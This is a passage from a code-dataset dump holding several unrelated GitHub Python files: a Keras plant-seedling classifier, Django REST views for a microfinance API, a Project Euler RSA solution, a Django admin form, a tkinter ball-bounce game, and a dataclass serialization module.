1,\n path_anchor_input, dir_name, property_name + property_filename_suffix,\n path_anchor_output, property_name + property_filename_suffix,\n counting_format, filename_extension=\".png\")\n","repo_name":"Scheiermann/supersolids","sub_path":"supersolids/scripts/multi_property.py","file_name":"multi_property.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38861259297","text":"# -*- coding: utf-8 -*-\nimport numpy as np # linear algebra\nimport random\nimport os # accessing directory structure\nfrom keras.applications import ResNet50\nfrom keras.layers import Dense, Flatten, Input, Softmax, LeakyReLU\nfrom keras.models import Model\nfrom keras import optimizers\nfrom keras.initializers import RandomUniform\n# GENERATING TRAINING DATA\nfrom PIL import Image\nimport cv2\nfrom pathlib import Path\nimport keras.backend as kb\n\nRAND = RandomUniform(minval=-.1, maxval=.1)\nALPHA = .01\nBATCH = 30\n\n\ndef create_data(catCnt):\n img = []\n target = []\n catNames = [\"Black-grass\", \"Charlock\", \"Cleavers\", \"Common Chickweed\", \"Common wheat\", \"Fat Hen\", \"Loose Silky-bent\", \"Maize\", \"Scentless Mayweed\", \"sp\", \"Small-flowered Cranesbill\", \"Sugar beet\"]\n catImgCnt = [335, 454, 349, 717, 259, 544, 806, 261, 609, 277, 581, 465]\n #cwd = os.getcwd()\n #dataLoc = \".\\\\data\"\n\n for i in range (catCnt):\n catNumber = random.randint(0,len(catNames)-1)\n catName = catNames[catNumber]\n tv = np.array([0,0,0,0,0,0,0,0,0,0,0,0])\n tv[catNumber] = 1\n imgLoc = str(i%catImgCnt[catNumber])+\".png\"\n pathImg = os.path.join(\"IntSys-Seedling\\\\data\",catName,imgLoc)\n path = Path(pathImg)\n if(path.is_file()):\n\n im_frame = cv2.imread(pathImg)\n if im_frame is not None:\n #resizing the image to 224, 224. This is a basic solution to the issue to varying image size\n h, w = 224, 224\n res_im = cv2.resize(im_frame, (w,h), interpolation=cv2.INTER_LINEAR)\n img.append(res_im)\n target.append(tv)\n return img, target\n\n#input layer description + creation\ndef create_resnet_layers( in_layer, freeze):\n #inLayer = Input(shape=(224, 224, 3), name='in_layer')\n res = ResNet50(weights = 'imagenet', include_top = False)\n cntr = 0\n if freeze and (cntr < 10 or cntr > 40):\n for l in res.layers :\n l.trainable = False\n cntr += 1\n cnn = (res)(in_layer)\n flat = Flatten()(cnn)\n\n den_1 = Dense(50, kernel_initializer = RAND, name = 'den_1')(flat)\n relu_ff_1 = LeakyReLU(ALPHA, name = 'relu_ff_1')(den_1)\n den_2 = Dense(12, kernel_initializer = RAND, name = 'den_2')(relu_ff_1)\n relu_ff_2 = LeakyReLU(ALPHA, name = 'relu_ff_2')(den_2)\n output = Softmax(name = 'soft')(relu_ff_2)\n return output\n\n#compile model\ndef create_model(freeze, p):\n in_layer = Input(shape=(224, 224, 3), name='in_layer')\n output = create_resnet_layers(in_layer, freeze)\n model = Model(inputs=in_layer, outputs = output)\n model.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n if(p):\n print(model.summary())\n return model\n\ndef train_baselineRes(freeze, p, cnt):\n model = create_model(freeze,p)\n img, target = create_data(cnt)\n length = len(img)\n trainImg = img[:int(length*.8)]\n trainTarget = target[:int(length*.8)]\n testImg = img[int(length*.8):]\n testTarget = target[int(length*.8):]\n model.fit(x=np.array(trainImg), y=np.array(trainTarget), batch_size=BATCH, epochs = 90, shuffle=True, validation_data = (np.array(testImg), np.array(testTarget)))\n #acc = 0\n #while acc < .9:\n # model.fit(x=np.array(trainImg), y=np.array(trainTarget), batch_size=BATCH, epochs = 100, shuffle=True, validation_data = (np.array(testImg), np.array(testTarget)))\n # loss, acc = model.evaluate(x=np.array(testImg), y=np.array(testTarget), verbose=1)\n #print(loss, \"\\n\", acc)\n model.save_weights('resBaseLine.h5')\n","repo_name":"CornellDataScience/IntSys-Seedling","sub_path":"models/resnet/resnet_keras.py","file_name":"resnet_keras.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"21529836949","text":"from rest_framework import generics\nfrom django.db.utils import IntegrityError \nfrom django.http import QueryDict\n\nfrom .models import Institution, InstitutionSettings, InstitutionStaff\nfrom .serializers import InstitutionCreateSerializer, InstitutionSettingsCreateSerializer, InstitutionStaffCreateSerializer\nfrom accounts.serializers import UserSerializer, InstitutionUserSerializer\nfrom django.http import Http404\nfrom rest_framework.views import APIView\nfrom accounts.models import User\nfrom helpers.helpers import get_object\n\nfrom rest_framework.response import Response\nfrom rest_framework import serializers\nfrom rest_framework import status\nfrom rest_framework import permissions\nfrom accounts.permissions import BranchManagerPermissions, LoanClientPermissions, LoanOfficerPermissions, InstitutionAdministratorPermissions, InstitutionAdministratorAndLoanOfficerPermissions\n\n\nclass InstitutionList(APIView):\n \"\"\"\n List all institutions and create institutions\n \"\"\"\n permission_classes = (permissions.IsAuthenticated, InstitutionAdministratorPermissions)\n\n def post(self, request, format=None):\n serializer = InstitutionCreateSerializer(data=request.data)\n if serializer.is_valid():\n try:\n serializer.save(created_by=self.request.user, is_institution_active=True)\n data_dict = {\"status\":201, \"data\":serializer.data}\n return Response(data_dict, status=status.HTTP_201_CREATED)\n except:\n return Response({'Error':'User has already created an institution'})\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass InstitutionDetail(APIView):\n \"\"\"\n Get institution Details\n \"\"\"\n permission_classes = (permissions.IsAuthenticated, InstitutionAdministratorAndLoanOfficerPermissions)\n\n def get(self, request, pk, format=None):\n institution = get_object(Institution, pk)\n if institution:\n institution_serializer = InstitutionCreateSerializer(institution)\n return Response(institution_serializer.data, status=status.HTTP_200_OK)\n else:\n error_message_dict = {\"status\":404, \"error\":\"Institution doesnot exist\"}\n return Response(error_message_dict, status=status.HTTP_404_NOT_FOUND)\n\n # def put(self, request, pk, format=None):\n # loan_group = get_object(Loans, pk)\n # serializer = LoansSerializer(loan_group, data=request.data)\n # if serializer.is_valid():\n # serializer.save()\n # return Response(serializer.data)\n # return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass InstitutionSettingsList(APIView):\n \"\"\"\n List all insttitution settings and create an institution setting\n \"\"\"\n permission_classes = (permissions.IsAuthenticated, InstitutionAdministratorPermissions)\n\n # def get(self, request, format=None):\n # snippets = InstitutionSettings.objects.all()\n # serializer = InstitutionSettingsCreateSerializer(snippets, many=True)\n # data_dict = {\"status\":200, \"data\":serializer.data}\n # return Response(data_dict, status=status.HTTP_200_OK)\n\n def post(self, request, format=None):\n serializer = InstitutionSettingsCreateSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n data_dict = {\"status\":201, \"data\":serializer.data}\n return Response(data_dict, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass InstitutionSettingsDetail(APIView):\n \"\"\"\n Get institution Settings Details\n \"\"\"\n permission_classes = (permissions.IsAuthenticated, InstitutionAdministratorAndLoanOfficerPermissions)\n\n def get(self, request, pk, format=None):\n institution_settings = get_object(InstitutionSettings, pk)\n if institution_settings:\n institution_settings_serializer = InstitutionSettingsCreateSerializer(institution_settings)\n return Response(institution_settings_serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(\"Institution doesnot exist\", status=status.HTTP_404_NOT_FOUND)\n\nclass InstitutionStaffCreate(APIView):\n\n permission_classes = (permissions.IsAuthenticated, InstitutionAdministratorPermissions)\n def post(self, request, format=None):\n staff_data = request.data.copy()\n # try:\n username = staff_data.pop('username', None)\n first_name = staff_data.pop('first_name', None)\n last_name = staff_data.pop('last_name', None)\n email = staff_data.pop('email', None)\n password = staff_data.pop('password', None)\n\n user_data_dict = {\n 'username':username[0],\n 'first_name':first_name[0],\n 'last_name': last_name[0],\n 'email':email[0],\n 'password':password[0],\n }\n\n #recreating the query dict\n user_data_query_dict = QueryDict('', mutable=True)\n user_data_query_dict.update(user_data_dict)\n\n staff_serializer = InstitutionStaffCreateSerializer(data=staff_data)\n if staff_serializer.is_valid():\n #add query dict to user serializer\n user_account_serializer = InstitutionUserSerializer(data=user_data_query_dict)\n user_account_serializer.is_valid(raise_exception=True)\n if staff_serializer.validated_data['staff_role'] == 'LOAN_OFFICER':\n user_account_serializer.save(is_loan_officer=True)\n elif staff_serializer.validated_data['staff_role'] == 'BRANCH_MANAGER':\n user_account_serializer.save(is_branch_manager=True)\n elif staff_serializer.validated_data['staff_role'] == 'LOAN_MANAGER':\n user_account_serializer.save(is_loan_manager=True)\n elif staff_serializer.validated_data['staff_role'] == 'TELLER':\n user_account_serializer.save(is_teller=True)\n elif staff_serializer.validated_data['staff_role'] == 'ASST_BRANCH_MANAGER':\n user_account_serializer.save(is_asst_branch_manager=True)\n\n user = User.objects.get(pk=user_account_serializer.data['id'])\n \n staff_serializer.save(user_id=user)\n \n #send twilio sms with registration details\n phone_number = \"{}{}\".format(staff_serializer.data['phone_dialing_code'], staff_serializer.data['phone_number'])\n message = \"Welcome to MFI, Your one time password is 0098\"\n try:\n send_sms(phone_number, message)\n except:\n print(\"Message Not sending\")\n data_dict = {\"status\":201, \"data\":staff_serializer.data}\n return Response(data_dict, status=status.HTTP_201_CREATED)\n # except:\n # print(\"Failed\")\n # # return Response(member_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n return Response(staff_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n","repo_name":"KapsonLabs/mfi-systems","sub_path":"mfi_systems_api/institution/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"74740140437","text":"#!/usr/bin/env python2.6\n\nfrom time import time\nfrom gmpy import gcd # much faster than homecoded or fractions.gcd()\nstart = time()\n\n# Section 1: preliminary definitions\np = 1009; pm1 = p - 1\nq = 3643; qm1 = q - 1\nn = p * q\nphi = pm1 * qm1\n\n# Section 2: building our list of usable e values, as an iterator object\nes = (e for e in xrange(1, phi, 2) if gcd(e, phi) == 1)\n\n# Section 3: building a dict of # unconcealed messages\nn_unc = {}\nfor e in es:\n u = (1 + gcd(e - 1, pm1)) * (1 + gcd(e - 1, qm1))\n if u in n_unc:\n n_unc[u].append(e)\n else:\n n_unc[u] = [e]\n\n# Section 4: printing sum of es that give min # unc. messages\nm = min(n_unc.iterkeys())\nprint(sum(n_unc[m]))\nprint(time() - start)\n","repo_name":"genos/online_problems","sub_path":"euler/previous/euler182.py","file_name":"euler182.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"73383185237","text":"from django.contrib import admin\nfrom django.contrib.admin.utils import get_deleted_objects\nfrom django.db import router\nfrom django import forms\nfrom idgo_admin.models import License\n\n\nclass LicenseAdminForm(forms.ModelForm):\n\n class Meta(object):\n model = License\n fields = '__all__'\n widgets = {\n 'alternate_titles': forms.Textarea(),\n 'alternate_urls': forms.Textarea(),\n }\n\n\nclass LicenseAdmin(admin.ModelAdmin):\n form = LicenseAdminForm\n list_display = ('title', 'alternate_titles',)\n ordering = ('title',)\n\n def get_actions(self, request):\n actions = super().get_actions(request)\n if 'delete_selected' in actions:\n del actions['delete_selected']\n return actions\n\n def has_delete_permission(self, request, obj=None):\n if obj:\n # Ici on récupere brutalement les objets suscebtibles d'etre supprimés\n # si on aurai supprimé l'instance courante\n opts = self.model._meta\n using = router.db_for_write(self.model)\n (deleted_objects, model_count, perms_needed, protected) = get_deleted_objects(\n [obj], opts, request.user, self.admin_site, using)\n # Si on ne retrouve uniquement que l'instance courante parmis\n # les objets a supprimés alors on autorise.\n if len(deleted_objects) == 1:\n return True\n\n return False\n\n\nadmin.site.register(License, LicenseAdmin)\n","repo_name":"DataSud/DataSud-2017-2019","sub_path":"idgo_admin/admin/license.py","file_name":"license.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"39132540424","text":"from tkinter import*\nimport time\nimport random\n\nroot = Tk()\n\nroot.title(\"bounce!\")\nroot.resizable(0, 0)\nroot.wm_attributes(\"-topmost\", 1)\n\ncanvas = Canvas(root, width = 500, height = 500, bd = 0, bg = 'black', highlightthickness = 0)\ncanvas.pack()\n\nroot.update()\n\nglobal counter\ncounter = 0\n\nglobal count\ncount = 0\n\nclass Ball:\n def __init__(self, canvas, paddle, color, obs):\n self.canvas = canvas\n self.paddle = paddle\n self.obs = obs\n self.id = canvas.create_oval(10, 10, 25, 25, fill = color)\n self.canvas.move(self.id, 250, 200)\n\n start = [-3, -2, -1, 1, 2, 3]\n random.shuffle(start)\n self.x = -1\n self.y = start[0]\n self.canvas_height = self.canvas.winfo_height()\n self.canvas_width = self.canvas.winfo_width()\n\n def hitPaddle(self, pos):\n paddle_pos = self.canvas.coords(self.paddle.id)\n\n if pos[2] >= paddle_pos[0] and pos[0] <= paddle_pos[2]:\n if pos[3] >= paddle_pos[1] and pos[1] <= paddle_pos[3]:\n return True\n return False\n\n\n def hitobs(self, pos, speed):\n global counter\n \n if(len(obs) == 0):\n canvas.create_text(250, 250, text = \"YOU WON\", fill = 'red')\n counter = counter + 1\n \n for i in range(len(obs)):\n obs_pos = self.canvas.coords(self.obs[i].id)\n\n if pos[2] >= obs_pos[0] and pos[0] <= obs_pos[2]:\n if pos[3] >= obs_pos[1] and pos[1] <= obs_pos[3]:\n\n self.canvas.delete(self.obs[i].id)\n self.obs.remove(self.obs[i])\n\n self.y = speed[0]\n\n return True\n return False\n\n def draw(self):\n global counter\n self.canvas.move(self.id, self.x, self.y)\n pos = self.canvas.coords(self.id)\n speed = [3, 4]\n random.shuffle(speed)\n\n if pos[0] <= 0:\n self.x = speed[0]\n if pos[2] >= self.canvas_width:\n self.x = -speed[0]\n\n if pos[1] <= 0:\n self.y = speed[0]\n if pos[3] >= self.canvas_height:\n canvas.create_text(250, 50, text = \"GAME OVER\", fill = 'red')\n counter = counter+1\n\n if self.hitPaddle(pos) == True:\n self.y = -speed[0]\n\n self.hitobs(pos, speed)\n \n\nclass Obs:\n def __init__(self, canvas, color, x, y):\n self.canvas = canvas\n self.id = canvas.create_rectangle(0, 0, 37, 37, fill = color)\n self.canvas.move(self.id, x, y)\n\nclass Paddle:\n def __init__(self, canvas, color):\n self.canvas = canvas\n self.id = canvas.create_rectangle(0, 0, 100, 10, fill = color)\n self.canvas.move(self.id, 250, 490)\n self.x = 0\n self.canvas_width = self.canvas.winfo_width()\n self.canvas.focus_set()\n self.canvas.bind_all('', self.turnLeft)\n self.canvas.bind_all('', self.turnRight)\n\n def turnLeft(self, event):\n paddle_pos = self.canvas.coords(self.id)\n if paddle_pos[0] <= 0:\n self.x = 0\n else:\n self.x = -6\n self.canvas.move(self.id, self.x, 0)\n def turnRight(self, event):\n paddle_pos = self.canvas.coords(self.id)\n if paddle_pos[2] >= self.canvas_width:\n self.x = 0\n else:\n self.x = 6\n self.canvas.move(self.id, self.x, 0)\n\npaddle = Paddle(canvas, \"white\")\n\nCOLOR = [\"PeachPuff3\", \"dark slate gray\", \"rosy brown\", \"light goldenrod yellow\", \"turquoise3\", \"salmon\",\n \"light steel blue\", \"dark khaki\", \"pale violet red\", \"orchid\", \"tan\", \"MistyRose2\",\n \"DodgerBlue4\", \"wheat2\", \"RosyBrown2\", \"bisque3\", \"DarkSeaGreen1\"]\nb = []\nfor i in range(0, 3):\n\n for j in range(0, 12):\n random.shuffle(COLOR)\n tmp = Obs(canvas, COLOR[0], (50 * j) + 10, (50 * i))\n b.append(tmp)\n\n\nobs = b\nball = Ball(canvas, paddle, \"red\", obs)\nwhile(1):\n ball.draw()\n root.update()\n root.update_idletasks()\n time.sleep(0.01)\n if(counter>0):\n break\n\nroot.mainloop()\n","repo_name":"jasmeenlongia/ball_bounce_game","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6080004868","text":"import dataclasses\nimport inspect\nimport sys\nfrom abc import ABC, abstractmethod\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom typing import Any, Callable, Dict, NamedTuple, Type, TypeVar\nfrom uuid import UUID, uuid4\n\nfrom orjson import orjson\n\nimport utils\nfrom utils import datetime_now_utc\n\nT = TypeVar('T', UUID, float, int, str, bool)\n\n_factory_list = list\n_factory_datetime = datetime_now_utc\n_factory_uuid = uuid4\n\n_classes_str2cls: Dict[str, type] = dict()\n_classes_cls2str: Dict[type, str] = dict()\n_field_names_camel2snake: Dict[type, Dict[str, str]] = dict()\n_field_names_snake2camel: Dict[type, Dict[str, str]] = dict()\n\n\n\n\ndef _orjson_dumps(v, *, default):\n # orjson.dumps returns bytes, to match standard json.dumps we need to decode\n return orjson.dumps(v, default=default).decode()\n\n\nclass DatabaseRow(NamedTuple):\n id: UUID\n ver: int\n parent_id: UUID | None\n type: str\n data: str\n\n\nclass SerializerWriter(ABC):\n\n @classmethod\n @abstractmethod\n def create_writer(cls, type: type):\n raise NotImplementedError\n\n @abstractmethod\n def export_row(self, name: str, value: str | None) -> DatabaseRow:\n raise NotImplementedError\n\n @abstractmethod\n def set_id(self, value: UUID):\n raise NotImplementedError\n\n @abstractmethod\n def set_parent_id_optional(self, value: UUID | None):\n raise NotImplementedError\n\n def set_parent(self, value: UUID):\n if value is None: raise ValueError(\"parent_id cannot be None\")\n self.set_parent_id_optional(value)\n\n @abstractmethod\n def set_uuid_optional(self, name: str, value: UUID | None):\n raise NotImplementedError\n\n def set_uuid(self, name: str, value: UUID | None):\n if value is None: raise ValueError(f\"{name} cannot be None\")\n self.set_uuid_optional(name, value)\n\n @abstractmethod\n def set_int_optional(self, name: str, value: int | None):\n raise NotImplementedError\n\n def set_int(self, name: str, value: int | None):\n if value is None: raise ValueError(f\"{name} cannot be None\")\n self.set_int_optional(name, value)\n\n @abstractmethod\n def set_float_optional(self, name: str, value: float | None):\n raise NotImplementedError\n\n def set_float(self, name: str, value: float | None):\n if value is None: raise ValueError(f\"{name} cannot be None\")\n self.set_float_optional(name, value)\n\n @abstractmethod\n def set_bool_optional(self, name: str, value: bool | None):\n raise NotImplementedError\n\n def set_bool(self, name: str, value: bool | None):\n if value is None: raise ValueError(f\"{name} cannot be None\")\n self.set_bool_optional(name, value)\n\n @abstractmethod\n def set_str_optional(self, name: str, value: str | None):\n raise NotImplementedError\n\n def set_str(self, name: str, value: str | None):\n if value is None: raise ValueError(f\"{name} cannot be None\")\n self.set_str_optional(name, value)\n\n @abstractmethod\n def set_datetime_optional(self, name: str, value: datetime | None):\n raise NotImplementedError\n\n def set_datetime(self, name: str, value: datetime | None):\n if value is None: raise ValueError(f\"{name} cannot be None\")\n self.set_datetime_optional(name, value)\n\n\nclass SerializerWriterJson(SerializerWriter):\n __slots__ = {\n \"_v_type\": \"The class being written for\",\n \"_v_id\": \"The UUID id value\",\n \"_v_parent_id\": \"The Optional[UUID] parent id value\",\n \"_v_data\": \"The Dict[str, Any | None] containing the data\",\n }\n\n _v_type: type\n _v_id: UUID\n _v_parent_id: UUID | None\n _v_data: Dict[str, Any | None]\n\n @classmethod\n def create_writer(cls, type: type):\n o = cls()\n o._v_type = type\n o._v_id = None\n o._v_parent_id = None\n o._v_data = dict()\n return o\n\n def export_row(self, name: str, value: str | None) -> DatabaseRow:\n if self._v_id is None: raise ValueError(\"id not assigned\")\n # data = orjson.dumps(self.v_data, default=default).decode()\n data = orjson.dumps(self._v_data, option=orjson.OPT_NAIVE_UTC).decode()\n return DatabaseRow(self._v_id, 1, self._v_parent_id, _classes_cls2str[self._v_type], data)\n\n def set_id(self, value: UUID):\n self._v_id = value\n\n def set_parent_id_optional(self, value: UUID | None):\n self._v_parent_id = value\n\n def set_uuid_optional(self, name: str, value: UUID | None):\n if value is None: return # do not write None\n self._v_data[_field_names_snake2camel[self._v_type][name]] = value\n\n def set_int_optional(self, name: str, value: int | None):\n if value is None: return # do not write None\n self._v_data[_field_names_snake2camel[self._v_type][name]] = value\n\n def set_float_optional(self, name: str, value: float | None):\n if value is None: return # do not write None\n self._v_data[_field_names_snake2camel[self._v_type][name]] = value\n\n def set_bool_optional(self, name: str, value: bool | None):\n if value is None: return # do not write None\n self._v_data[_field_names_snake2camel[self._v_type][name]] = value\n\n def set_str_optional(self, name: str, value: str | None):\n if value is None: return # do not write None\n self._v_data[_field_names_snake2camel[self._v_type][name]] = value\n\n def set_datetime_optional(self, name: str, value: datetime | None):\n if value is None: return # do not write None\n self._v_data[_field_names_snake2camel[self._v_type][name]] = value\n\n\nclass SerializerReader(ABC):\n @classmethod\n @abstractmethod\n def create_reader(cls, row: DatabaseRow):\n raise NotImplementedError\n\n @abstractmethod\n def get_id(self) -> UUID:\n raise NotImplementedError\n\n @abstractmethod\n def get_parent_id_optional(self) -> UUID | None:\n raise NotImplementedError\n\n def get_parent_id(self) -> UUID:\n v = self.get_parent_id_optional()\n if v is None: raise ValueError(\"parent_id cannot be None\")\n return v\n\n @abstractmethod\n def get_uuid_optional(self, name: str) -> UUID | None:\n raise NotImplementedError\n\n def get_uuid(self, name: str) -> UUID:\n v = self.get_uuid_optional(name)\n if v is None: raise ValueError(f\"{name} cannot be None\")\n return v\n\n @abstractmethod\n def get_int_optional(self, name: str) -> int | None:\n raise NotImplementedError\n\n def get_int(self, name: str) -> int:\n v = self.get_int_optional(name)\n if v is None: raise ValueError(f\"{name} cannot be None\")\n return v\n\n @abstractmethod\n def get_float_optional(self, name: str) -> float | None:\n raise NotImplementedError\n\n def get_float(self, name: str) -> float:\n v = self.get_float_optional(name)\n if v is None: raise ValueError(f\"{name} cannot be None\")\n return v\n\n @abstractmethod\n def get_bool_optional(self, name: str) -> bool | None:\n raise NotImplementedError\n\n def get_bool(self, name: str) -> bool:\n v = self.get_bool_optional(name)\n if v is None: raise ValueError(f\"{name} cannot be None\")\n return v\n\n @abstractmethod\n def get_str_optional(self, name: str) -> str | None:\n raise NotImplementedError\n\n def get_str(self, name: str) -> str:\n v = self.get_str_optional(name)\n if v is None: raise ValueError(f\"{name} cannot be None\")\n return v\n\n @abstractmethod\n def get_datetime_optional(self, name: str) -> datetime | None:\n raise NotImplementedError\n\n def get_datetime(self, name: str) -> datetime:\n v = self.get_datetime_optional(name)\n if v is None: raise ValueError(f\"{name} cannot be None\")\n return v\n\n\nclass SerializerReaderJson(SerializerReader):\n __slots__ = {\n \"_v_type\": \"The class being read for\",\n \"_v_id\": \"The UUID id value\",\n \"_v_parent_id\": \"The Optional[UUID] parent id value\",\n \"_v_data\": \"The Dict[str, Any | None] containing the data\",\n }\n\n _v_type: type\n _v_id: UUID\n _v_parent_id: UUID | None\n _v_data: Dict[str, Any | None]\n\n @classmethod\n def create_reader(cls, row: DatabaseRow):\n o = cls()\n o._v_type = _classes_str2cls[row.type]\n o._v_id = row.id\n o._v_parent_id = row.parent_id\n o._v_data = orjson.loads(row.data)\n return o\n\n def get_id(self) -> UUID:\n return self._v_id\n\n def get_parent_id_optional(self) -> UUID | None:\n return self._v_parent_id\n\n def _get_value(self, name: str):\n v = self._v_data.get(_field_names_camel2snake[self._v_type][name])\n if v is not None: return v\n return self._v_data.get(name) # just in case was written snake rather then camel\n\n def _get_value_parsed(self, name: str, type: type, type_factory: Callable = None, expected_len=None):\n v = self._get_value(name)\n if v is None: return None\n if isinstance(v, type): return v\n if not isinstance(v, str): v = str(v)\n if v is None: return None\n if isinstance(v, type): return v # for str type\n if len(v) == 0: return None\n if type_factory is None: type_factory = type\n if expected_len is not None and len(v) == expected_len: return type_factory(v) # for UUID type\n v = utils.trim(v)\n if v is None: return None\n return type_factory(v)\n\n def get_uuid_optional(self, name: str) -> UUID | None:\n return self._get_value_parsed(name, UUID, expected_len=36)\n\n def get_int_optional(self, name: str) -> int | None:\n return self._get_value_parsed(name, int)\n\n def get_float_optional(self, name: str) -> float | None:\n return self._get_value_parsed(name, float)\n\n def get_bool_optional(self, name: str) -> bool | None:\n return self._get_value_parsed(name, bool, type_factory=utils.bool_parse_none)\n\n def get_str_optional(self, name: str) -> str | None:\n return self._get_value_parsed(name, str)\n\n def get_datetime_optional(self, name: str) -> datetime | None:\n return self._get_value_parsed(name, datetime, type_factory=utils.datetime_parse_none)\n\n\nserialization_reader: Type[SerializerReader] = SerializerReaderJson\nserialization_writer: Type[SerializerWriter] = SerializerWriterJson\n\n\n@dataclass(slots=True)\nclass DatabaseObject:\n id: UUID\n\n\n\n\n\n@dataclass(slots=True)\nclass System(DatabaseObject):\n name: str\n\n @classmethod\n def create(cls, name: str):\n return cls(\n id=_factory_uuid(),\n name=name,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n name=r.get_str(\"name\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.id)\n w.set_str(\"name\", self.name)\n\n\nSYSTEM_CONFIG_ITEM_APP_SYSTEM = \"SYSTEM\".casefold()\nSYSTEM_CONFIG_ITEM_APP_WEB = \"WEB\".casefold()\nSYSTEM_CONFIG_ITEM_APP_SCHEDULER = \"SCHEDULER\".casefold()\nSYSTEM_CONFIG_ITEM_APP_EXECUTOR = \"EXECUTOR\".casefold()\n\n\n@dataclass(slots=True)\nclass SystemConfigItem(DatabaseObject):\n system_id: UUID\n app: str\n name: str\n value: str | None\n\n @classmethod\n def create(cls, system_id: UUID, app: str, name: str, value: str):\n return cls(\n id=_factory_uuid(),\n system_id=system_id,\n app=app,\n name=name,\n value=value,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n system_id=r.get_parent_id(),\n app=r.get_str(\"app\"),\n name=r.get_str(\"name\"),\n value=r.get_str_optional(\"value\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.system_id)\n w.set_str(\"app\", self.app)\n w.set_str(\"name\", self.name)\n w.set_str_optional(\"value\", self.value)\n\n\n@dataclass(slots=True)\nclass SystemActionConfigItem(DatabaseObject):\n system_id: UUID\n action: str\n name: str\n value: str\n\n @classmethod\n def create(cls, system_id: UUID, action: str, name: str, value: str):\n return cls(\n id=_factory_uuid(),\n system_id=system_id,\n action=action,\n name=name,\n value=value,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n system_id=r.get_parent_id(),\n action=r.get_str(\"action\"),\n name=r.get_str(\"name\"),\n value=r.get_str(\"value\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.system_id)\n w.set_str(\"action\", self.action)\n w.set_str(\"name\", self.name)\n w.set_str(\"value\", self.value)\n\n\ndef dostuff():\n dcs = utils.dataclass_infos_in_module(__name__)\n print(f\"Found {len(dcs)} dataclasses\")\n #raise ValueError(f\"{_f.name} has invalid types\")\n\n for dc in dcs:\n for f in dc.fields.values():\n if len(f.type.subtypes) > 0: raise ValueError(f\"{dc.name}.{f.name} has invalid types\")\n\n@dataclass(slots=True)\nclass User(DatabaseObject):\n system_id: UUID\n is_active: bool\n username: str\n password: str\n is_admin: bool\n email: str | None\n\n @classmethod\n def create(cls, system_id: UUID, username: str, password: str):\n return cls(\n id=_factory_uuid(),\n system_id=system_id,\n is_active=True,\n username=username,\n password=password,\n is_admin=False,\n email=None,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n system_id=r.get_parent_id(),\n is_active=r.get_bool(\"is_active\"),\n username=r.get_str(\"username\"),\n password=r.get_str(\"password\"),\n is_admin=r.get_bool(\"is_admin\"),\n email=r.get_str_optional(\"email\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.system_id)\n w.set_bool(\"is_active\", self.is_active)\n w.set_str(\"username\", self.username)\n w.set_str(\"password\", self.password)\n w.set_bool(\"is_admin\", self.is_admin)\n w.set_str_optional(\"email\", self.email)\n\n\n@dataclass(slots=True)\nclass Job(DatabaseObject):\n system_id: UUID\n is_active: bool\n name: str\n\n @classmethod\n def create(cls, system_id: UUID, name: str):\n return cls(\n id=_factory_uuid(),\n system_id=system_id,\n is_active=True,\n name=name,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n system_id=r.get_parent_id(),\n is_active=r.get_bool(\"is_active\"),\n name=r.get_str(\"name\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.system_id)\n w.set_bool(\"is_active\", self.is_active)\n w.set_str(\"name\", self.name)\n\n\n@dataclass(slots=True)\nclass JobTag(DatabaseObject):\n job_id: UUID\n name: str\n value: str\n\n @classmethod\n def create(cls, job_id: UUID, name: str, value: str):\n return cls(\n id=_factory_uuid(),\n job_id=job_id,\n name=name,\n value=value,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n job_id=r.get_parent_id(),\n name=r.get_str(\"name\"),\n value=r.get_str(\"value\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.job_id)\n w.set_str(\"name\", self.name)\n w.set_str(\"value\", self.value)\n\n\n@dataclass(slots=True)\nclass JobSchedule(DatabaseObject):\n job_id: UUID\n is_active: bool\n cron: str\n\n @classmethod\n def create(cls, job_id: UUID, cron: str):\n return cls(\n id=_factory_uuid(),\n job_id=job_id,\n is_active=True,\n cron=cron,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n job_id=r.get_parent_id(),\n 